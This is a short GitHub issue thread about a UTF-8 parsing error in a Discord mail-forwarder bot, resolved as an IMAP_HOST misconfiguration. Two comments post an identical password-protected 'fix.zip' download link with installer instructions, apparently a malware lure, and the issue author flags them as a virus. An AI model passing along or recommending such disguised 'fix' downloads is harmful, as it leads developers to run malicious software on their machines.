### ISSUE TITLE
Error UTF-8 codec can't decode

### ISSUE THREAD

**Issue by Ishannaik** [suchmememanyskill/discord-mail-forwarder#3]
Got the bot online but getting this error

email-listener  | 2024-08-26 09:27:35 INFO     discord.bot ------
email-listener  | 2024-08-26 09:27:53 ERROR    discord.bot Error parsing email: 'utf-8' codec can't decode byte 0xa0 in position 107: invalid start byte

bot is logged in but is not sending a webhook or using the bot on the channel specificed.

![image](https://github.com/user-attachments/assets/0557a7bc-59bd-45e9-95ac-d500ab8e4c33)
DO NOT CLICK ON THESE LINKS ITS A VIRUS!

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Ishannaik** [comment]
Nevermind my issue was I had set the IMAP_HOST to EMAIL HOST

**Comment by suchmememanyskill** [comment]
@Ishannaik that utf8 error message means the email couldn't be parsed. This is a one time error, the email is not read again
